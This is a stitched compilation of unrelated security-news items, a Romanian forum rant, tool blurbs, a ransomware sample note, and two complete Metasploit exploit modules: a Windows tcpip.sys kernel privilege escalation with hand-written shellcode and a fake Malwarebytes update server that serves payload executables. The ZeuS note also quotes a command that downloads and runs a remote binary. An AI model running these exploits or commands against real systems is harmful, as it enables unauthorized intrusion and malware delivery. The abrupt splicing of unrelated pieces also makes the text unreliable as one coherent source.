When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser. A team of experts from HP’s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they’d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense. A chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs. “We were very excited when we heard the results from Microsoft,” Gorenc, ZDI lead researcher, said. “We put a lot of time and effort into that research. We’re glad to hear Microsoft got good data out of it.” Gorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR). “We use one mitigation to defeat another,” he said. “Stuff like this has been done in the past, but what’s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we’ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. 
It was interesting to see one used against another.” Use-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when a program keeps using a pointer after the memory it refers to has been freed; if an attacker can get that freed memory reallocated with contents they control, the stale pointer now reads or writes attacker-chosen data, which can be steered into executing the attacker's code. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part, bypasses of and attacks against mitigations have largely been confined to researchers and academics, but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. Operation Snowman, for example, an APT operation against military and government targets, scanned for the presence of EMET and would not execute if the tool was detected. Internet Explorer has been plagued by memory corruption bugs forever it seems, with Microsoft releasing almost monthly cumulative updates for the browser which is constantly being used in targeted attacks and has been easy pickings for hackers. “The attack surface is valuable and has to exist,” Gorenc said of IE and use-after-free bugs. “It’s an attack surface where with slight manipulations, you can gain code execution on the browser.” ZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million over the past nine years buying vulnerabilities. Gorenc’s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said.
For these attacks, Zuckerbraun reverse engineered MemProtect, studying how it stymied use-after-free vulnerabilities. Hariri focused on bypassing Isolated Heap. Together with Gorenc’s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft. The reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM. “HP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,” Gorenc said. “We look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.” Source
What drove IT admins crazy about the Bash vulnerability was that it was difficult to determine—and patch—everything that was making a Bash call. It was everywhere. Apparently, some of that angst applies to the Ghost vulnerability in the GNU C library, known as glibc. At first, experts believed the bug, which was related to gethostbyname function calls, was confined to Linux systems, but it didn’t take long for other exploit vectors such as PHP applications, to surface. Researchers at Veracode this week published their look at Ghost and determined that like Bash, gethostbyname is relatively everywhere. And what’s sure to compound lingering frustration over Ghost is that gethostbyname was long ago deprecated and replaced by getaddrinfo() calls in order to satisfy IPv6 compatibility. “We were surprised by the pervasiveness of calls to these functions, which are older functions which have been deprecated for about 15 years, mainly because of their lack of support for IPv6,” said Veracode cofounder and CTO Chris Wysopal. “So this analysis shows that there’s still a lot of old software out there that’s being used in production applications.” Veracode said that 41 percent of the enterprise applications uploaded to its platform in the past 90 days rely on glibc to make gethostbyname function calls. The company added that 80 percent of those potentially vulnerable applications are critical off-the-shelf or homegrown business apps that access databases and backend systems executing sensitive transactions. Most of those vulnerable applications, Veracode said, were written in C or C++, but many are also Java, PHP and .NET apps. “This implies that the vulnerability may be more widespread than might otherwise be expected,” Wysopal said. “Knowing exactly where these applications reside can help enterprises prioritize their patching efforts in globally-distributed environments.” Ghost affects most Linux systems dating back almost 15 years, in particular glibc 2.2 through 2.17. 
The vulnerability was fixed in glibc in May 2013, though the fix was not labeled as a security fix and as a result may not have been widely deployed. Since the bug was disclosed, most Linux distributions have released patches, and experts say this is the best mitigation for Ghost. Note that because glibc is loaded into every running process, updating the package is not enough on its own: long-running services keep the old library mapped until they are restarted (or the host is rebooted). Researchers at Qualys discovered the vulnerability and posted a lengthy advisory that included proof-of-concept exploit code against the Exim SMTP mail transfer agent. In addition to Exim, clockdiff, procmail and pppd were initially identified as vulnerable to Ghost exploits. Since then, researchers at Sucuri also said that PHP applications, including WordPress, were another weak spot. Exploiting Ghost, however, remains a challenge. “Unlike with Heartbleed, which was a protocol-level vulnerability, exploiting this vulnerability requires a specially-crafted payload that has been targeted for a specific application and hardware platform,” Wysopal said. “That means you can’t simply reuse the proof-of-concept exploit developed by Qualys (for the Exim mail server) to attack other applications. As a result, GHOST attacks are more likely to be sophisticated and targeted.” Like other Internet-wide bugs, this one can be exploited to execute code remotely, manipulate files, install malware or turn the compromised machine into a bot to be used in DDoS attacks. “Some researchers believe that the most likely outcome in a real-world scenario would be a segmentation fault, not code execution, but this can also result in a DoS attack,” Wysopal said. The Ghost bug and other major vulnerabilities of the last nine months are a reminder of the frailty of open source security as well as how much insecure legacy code is running inside most enterprises.
“The most important conclusion is that our entire digital infrastructure is built on applications and components that were fundamentally not designed for the hostile cyber environment in which we find ourselves today,” said Wysopal, who added that 90 percent of the applications scanned and analyzed by Veracode’s service contain common application security vulnerabilities such as SQL injection. “Rather, they were designed with a primary focus on functionality rather than on secure programming practices.” Source
Win32/Ransom.Generic
Fetele, de ce comentati aiurea? postul era de xylitol ( un om foarte cunoscut in Franta si influent) ma cunosc cu el de ceva timp. app am pus sursa ca de pe acel forum l-am luat dar ulterior au mutat postul. ( Sunt membru pe KM din 2010 ) Download-ul inca merge asa ca GURA! Va place sa comentati aiurea dar inainte incercati sa descarcati geniilor. @NETGEAR in loc sa comentati da-ti log out. Nu mai comentati aiurea, nu mai incercati sa va bagati in seama cu mine ca nu dau tuturor.... importanta! Voi sunteti aici doar pentru offtopic ( fiindca sa vede ca doar asta va duce capul) Ba mai mult unu dintre voi (se stie el) are deja 20 de conturi banate si asta spune totul. AMIN! Melodie cu dedicatie speciala pentru: Doru alu' Supozitor si Vasile n'Curamluat-o @NETGEAR Primele mele posturi sunt in 2011 ( 21-11-2011 )Oricum iti urez noroc cu cariera ta de hater( copil cu 8 clase ) -
A WordPress plugin downloaded half a million times has been used in zero day attacks that served up malware. The plugin in question is called FancyBox and creates a lightbox-like interface with which to look at images. It's been used by unknown actors to deliver a malicious iframe through a persistent (stored) cross-site scripting vulnerability identified by Russian researchers Gennady and Konstantin Kovshenin. The duo provided details to Sucuri chief tech bod Daniel Cid who issued an advisory warning users to remove the plugin. FancyBox's authors have updated the code, so users can now update to repaired versions that will close off the attack vector. Because the injected payload is stored on the site, updating the plugin does not remove an iframe that has already been injected; sites that were compromised before patching also need the stored content cleaned out. Cid said "many sites" were compromised but did not specify a figure. "After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site," Cid said. "What makes things worse, is that it's being actively exploited in the wild, leading to many compromised websites." WordPress pulled the plugin prior to the patch, as the vulnerability allowed random scripts to be loaded into vulnerable sites. Reports first emerged of the bug on the WordPress forums where users reported iframes were being injected from website 203koko. The vulnerability followed what was described as the "most serious" hole in five years, disclosed last November, that affected what was then estimated to be 86 per cent of WordPress websites. That cross-site scripting hole was found in the hugely-popular WP-Statistics plugin. Earlier, Cid revealed 50,000 WordPress websites had been infected with dodgy malware that found its way into MailPoet, another in a long line of plugins to have put sites at risk.
Hackers are using a zero-day vulnerability in Adobe Flash to infect systems with a dangerous BEDEP malware variant. Trend Micro research engineer Alvin Bacani reported uncovering the campaign in a threat advisory, proving that hackers began targeting the zero-day less than a week after its discovery. "Continuing our analysis of the recent Adobe zero-day exploit, we find that the infection chain does not end with the Flash exploit, detected as SWF_EXPLOIT.MJST. Rather, the exploit downloads and executes malware belonging to the BEDEP family," read the advisory. Trend Micro reported uncovering the Flash flaw on 2 February, warning that attackers could target victims with malvertising attacks. The flaw is originally believed to have been targeted by hackers using the Angler Exploit Kit to send malicious automatic pop-up adverts. Bacani explained that BEDEP employs the same malvertising infection tactic, but uses the Hanjuan exploit kit to connect victim machines to a criminal botnet. "Based on our analysis, the infection chain begins with a site that hosts malvertisements. As the name implies, these are infected online advertisements," read the advisory. "Our recent findings also show that the malware's main purpose is to turn infected systems into botnets for other malicious intentions. "Additionally, BEDEP is known for carrying out advertising fraud routines and downloading additional malware." The full scale of the campaign remains unknown and the nature of the BEDEP malware makes tracking the attacks difficult. "The fact that the payloads are encoded can be seen as one way of evading detection. An encoded payload will be difficult to identify when passing through the network layer, or when scanned in any layer in an encoded state," noted Bacani. "BEDEP initially came undetected and unnoticed due to its heavy encryption and use of Microsoft file properties for its disguise as well as the use of seemingly legitimate export functions." 
The flaw is one of three recently discovered Flash zero-day vulnerabilities. The first two were uncovered by Adobe in January and are known to have been actively targeted by hackers. Source
dirs3arch is a simple command line tool designed to brute force the discovery of directories and files on web sites. Changes: Ported to Python 3. Fixed issue 3. Fixed timeout exception. Other bugfixes. Download: dirs3arch Directory Checker 0.3.0 – Packet Storm
This is a PHP script that queries the third-party lookup service md5.gromweb.com to check whether a given MD5 hash matches a known (precomputed) value. Note that every hash submitted is disclosed to that external service, so do not use it on hashes derived from data you must keep confidential. Download: INURLBR MD5 Checker – Packet Storm
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

# Local privilege escalation through an arbitrary kernel write in the Windows
# TCP/IP driver tcpip.sys (CVE-2014-4076). Only an x86 Windows Server 2003 SP2
# target is defined; the per-target offsets are handed to
# token_stealing_shellcode (from the WindowsKernel mixin) in #exploit.
class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name' => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
      'Description' => %q{ A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys, can allow an attacker to inject controlled memory into an arbitrary location within the kernel. },
      'License' => MSF_LICENSE,
      'Author' => [
        'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
        'Jay Smith <jsmith[at]korelogic.com>' # MSF module
      ],
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets' => [
        # Structure offsets used by the token-stealing shellcode.
        ['Windows Server 2003 SP2',
          {
            '_KPROCESS' => "\x38",
            '_TOKEN' => "\xd8",
            '_UPID' => "\x94",
            '_APLINKS' => "\x98"
          }
        ]
      ],
      'References' => [
        ['CVE', '2014-4076'],
        ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
      ],
      'DisclosureDate'=> 'Nov 11 2014',
      'DefaultTarget' => 0
    }))
  end

  # Returns CheckCode::Safe for x64 or WOW64 sessions and when \\.\tcp cannot
  # be opened, CheckCode::Unknown when tcpip.sys is not found under %WINDIR%,
  # and CheckCode::Vulnerable only for a 5.2.3790 (Server 2003) tcpip.sys
  # whose file revision is below 5440.
  def check
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end
    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle
    session.railgun.kernel32.CloseHandle(handle)
    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
    unless file?(file_path)
      return Exploit::CheckCode::Unknown
    end
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
    # Version gate: the build must be 5.2.3790 and the revision pre-fix.
    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Refuses already-SYSTEM, WOW64 and x64 sessions and anything #check does not
  # report as Vulnerable; then stages the shellcode in the current process,
  # sends one IOCTL to \\.\tcp and re-checks is_system? before running the
  # payload.
  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end
    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end
    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
    end
    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open
    # RWX allocation of 0x4000 bytes at requested base 0x1000 in the current
    # process (-1); only address 0x1000 is verified writable afterwards.
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
    unless this_proc.memory.writable?(0x1000)
      fail_with(Failure::Unknown, 'Failed to allocate memory')
    end
    # 32-byte IOCTL input buffer. Field meanings are not documented here; see
    # the KoreLogic advisory listed in 'References'.
    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
    sc = token_stealing_shellcode(target, nil, nil, false)
    # move up the stack frames looking for nt!KiSystemServicePostCall
    sc << "\x31\xc9" # xor ecx, ecx
    sc << "\x89\xeb" # mov ebx, ebp
    # count_frames
    sc << "\x41" # inc ecx
    sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
    sc << "\x8b\x1b" # mov ebx, dword [ebx]
    sc << "\x75\xf4" # jne short count_frames
    sc << "\x49" # dec ecx
    # loop_frames
    sc << "\x49" # dec ecx
    sc << "\x89\xec" # mov esp, ebp
    sc << "\x5d" # pop ebp
    sc << "\x83\xf9\x00" # cmp ecx, 0
    sc << "\x75\xf7" # jne loop_frames
    sc << "\x31\xc0" # xor eax, eax
    sc << "\xc3" # ret
    # NOTE(review): the writes at 0x28, 0x2b and 0x38 are below the 0x1000
    # base requested above; presumably the allocation is rounded down so that
    # page 0 is mapped too, but the writable? check does not cover it — confirm.
    this_proc.memory.write(0x28, "\x87\xff\xff\x38")
    this_proc.memory.write(0x38, "\x00\x00")
    this_proc.memory.write(0x1100, buf)
    this_proc.memory.write(0x2b, "\x00\x00")
    this_proc.memory.write(0x2000, sc)
    print_status("Triggering the vulnerability...")
    # IOCTL 0x00120028 on \\.\tcp with buf (placed at 0x1100) as input.
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it
    print_status("Checking privileges after exploitation...")
    # Success is judged solely by the token check; there is no rollback if the
    # kernel write landed but did not elevate.
    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end
    print_good("Exploitation successful!")
    unless execute_shellcode(payload.encoded, nil, this_proc.pid)
      fail_with(Failure::Unknown, 'Error while executing the payload')
    end
  end
end
PHP backdoor, not that interesting but might occur more in the future. Reference: https://www.htbridge.com/blog/ransomweb_emerging_website_threat.html Download Source
Generic ransomware pushed to small ZeuS botnet machines by script: user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe) zeus script.png (835.88 KiB) Viewed 115 times ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX) 6ec6069728a91a04407283bc6bf208b7 UNPACKED Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack. winxp.png (590.39 KiB) Viewed 115 times I'm not a great RE like most ppl on here so I gave up and just patched the binary Change 00401C19 > JMP 0040124F (decryption routine) Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out. Download Source
Another security advisory covering Siemens industrial kit has reached the public, this time covering wireless industrial networking hardware. ICS-CERT advises that the Ruggedcom range of 802.16e (WiMAX, for those with long memories) devices from the company carries a range of vulnerabilities that let attackers obtain admin privileges for themselves. The vulnerabilities are: CVE-2015-1448 – attackers can get administrative access to the kit over the network, without authentication; CVE-2015-1449 – a buffer overflow in the integrated Web server means an attacker reaching port 443 might get remote code execution; and CVE-2015-1357 – a real treat: password hashes and other sensitive information “might” be stored in an insecure format and accessible from local files or security logs. Products impacted are in the company's WIN 51xx, WIN 52xx, WIN 70xx and WIN 72xx series. These are WiMAX base stations designed for harsh environment deployments. The ICS-CERT note puts the kit in a wide range of industries worldwide, including chemical, communications, critical manufacturing, dams, defence, energy, food and agriculture, government facilities, transportation systems, and water and wastewater systems. Siemens is asking customers to get in touch (via an online support request) to get a firmware update; until the update is applied, the unauthenticated administrative access and the port 443 overflow argue for keeping the management interfaces off any network an attacker can reach. And in a separate advisory, the company also updated the firmware for its Scalance-X switches (which connect things like programmable logic controllers to the control interfaces) to block a separate authentication failure in the Web interface. Details here.
Oracle has issued a patch to fix several bugs in its Hyperion Product Management financial consolidation and reporting application that could be remotely exploited by hackers. Oracle's Proactive Support team announced the fixes, confirming that they address a number of flaws in the Hyperion Planning 11.1.2.2.x part of the application. The company does not offer firm details about the patch to non-registered customers, and had not responded to V3's request for further details at the time of publishing. However, TK Keanini, chief technology officer at Lancope, told V3 that the user base and nature of data handled within Hyperion means customers should be concerned by the flaw. "If you are running this software, it contains up-to-date business intelligence that you must keep secure. So if you are running this software it is incredibly important to keep it up to date and patched," he said. ? "Ask yourself this: if the information in your Hyperion system was compromised and posted to the internet for all to see, would you be OK with that? ? "The problem most companies face is that they sometimes don't know what is running on their network and this is problem number one that must be solved." Keanini explained that companies should patch the remote access vulnerabilities as soon as possible, but added that he has yet to see any evidence of the flaws being actively exploited by hackers. "This is not just one vulnerability but several. The CVEs that have remote access are the most important to fix first," he said. ? "I have not [seen the flaws being exploited] but when data is published to the internet, it is not like attackers take the time to show their timeline and the provenance of the data. ? "This is always interesting data but also a dangerous indicator because it is a lagging indicator at best." The Hyperion patch is one of many critical fixes issued by Oracle this year. 
The firm released a critical update in January addressing 167 vulnerabilities across hundreds of its products, including Java. Source
CONTENTS I. Worms A. What are Worms ……………………………………………………....... 1 B. Few Popular Worms ………………………………………………….… 2 C. Propagation of Worms ……………………………………………….…. 3 D. Worm Signatures and Detection Strategies …………………………...... 5 II. Metamorphic Worms A. Introduction …………………………………………………………….. 6 B. Polymorphic vs. Metamorphic Worms ……………………………….... 6 C. Challenges faced during Detection …………………………………….. 7 D. Detection Strategies ……………………………………………………. 8 III. Result A. Metamorphic Engines ………………………………………………….. 9 B. Research Answer ……………………………………………………… 14 IV. Conclusion ………………………………………………………………... 15 V. References ………………………………………………………………… 16 Read more: http://dl.packetstormsecurity.net/papers/worms/fia_ppr.pdf
WordPress Platform Theme Remote Code Execution WordPress Pixabay Images PHP Code Upload
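##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Fake Malwarebytes update server (CVE-2014-4936). The module answers the
# client's version.chk poll with a higher version number and then serves the
# generated payload EXE in place of the setup package; it relies on the
# operator already being in a man-in-the-middle position for
# data-cdn.mbamupdates.com (see 'Description').
#
# Fixes versus the original listing:
# - set_exploit_target called serve_default_response(cli) with no `cli` in
#   scope (NameError for every non-vulnerable Anti-Malware client). The
#   response is now sent from on_request_uri, where `cli` exists.
# - the OSVDB reference type carried a leading space (' OSVDB').
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer

  # Update poll: /v2/<mbam|mbae>/consumer/version.chk ($1 = package).
  VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
  # Package download the client performs after seeing a newer version.
  EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
  # Version strings advertised to each client as the "available" update.
  NEXT_VERSION = {
    mbam: '2.0.3.1025',
    mbae: '1.04.1.1012'
  }

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
      'Description' => %q{ This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220. },
      'License' => MSF_LICENSE,
      'Author' => [
        'Yonathan Klijnsma', # Vulnerability discovery and PoC
        'Gabor Seljan', # Metasploit module
        'todb' # Module refactoring
      ],
      'References' => [
        [ 'CVE', '2014-4936' ],
        [ 'OSVDB', '116050'],
        [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
      ],
      'DefaultOptions' => { 'EXITFUNC' => 'process' },
      'Platform' => 'win',
      'Targets' => [ [ 'Windows Universal', {} ] ],
      'Privileged' => false,
      'DisclosureDate' => 'Dec 16 2014',
      'DefaultTarget' => 0
    ))

    # The client hard-codes port 80 and the root path of the update host.
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
      ], self.class)

    # Vulnerable Malwarebytes clients do not allow altering these.
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  # Routes each request: version poll -> fake update notice (or an empty page
  # when the client is not a candidate), setup download -> payload EXE,
  # anything else -> empty page.
  def on_request_uri(cli, request)
    case request.uri
    when VERSION_REGEX
      if set_exploit_target($1, request)
        serve_update_notice(cli)
      else
        serve_default_response(cli)
      end
    when EXE_REGEX
      serve_exploit(cli)
    else
      vprint_status "Sending empty page for #{request.uri}"
      serve_default_response(cli)
    end
  end

  # Empty 200 response.
  def serve_default_response(cli)
    send_response(cli, '')
  end

  # Anti-Malware clients report their version in the User-Agent ("base:a.b.c.d").
  # Returns true when that version is at or below NEXT_VERSION[:mbam]; false
  # (with an error line) otherwise, or when no version is reported.
  # NOTE(review): with `>=`, a client already at exactly 2.0.3.1025 is also
  # treated as vulnerable, although 'Description' says "before 2.0.3" —
  # confirm whether the comparison should be strict.
  def check_client_version(request)
    return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/
    this_version = $1
    next_version = NEXT_VERSION[:mbam]
    if Gem::Version.new(next_version) >= Gem::Version.new(this_version)
      return true
    else
      print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
      return false
    end
  end

  # Records which product is polling (in @client_software, as
  # [display name, version to advertise]) and returns whether the update
  # notice should be served. Does not write to the client; the caller decides
  # what to send when this returns false.
  def set_exploit_target(package, request)
    case package
    when /mbam/i
      return false unless check_client_version(request)
      @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
    when /mbae/i
      # We don't get identifying info from MBAE
      @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
    else
      return false
    end
    true
  end

  # Replies to the version poll with the spoofed "newer" version string.
  def serve_update_notice(cli)
    software, next_version = @client_software
    print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
    send_response(cli, next_version, 'Content-Type' => 'application/octet-stream' )
  end

  # Serves the generated payload EXE as the "setup" package.
  def serve_exploit(cli)
    print_status "Sending payload EXE..."
    send_response(cli, generate_payload_exe, 'Content-Type' => 'application/x-msdos-program' )
  end
end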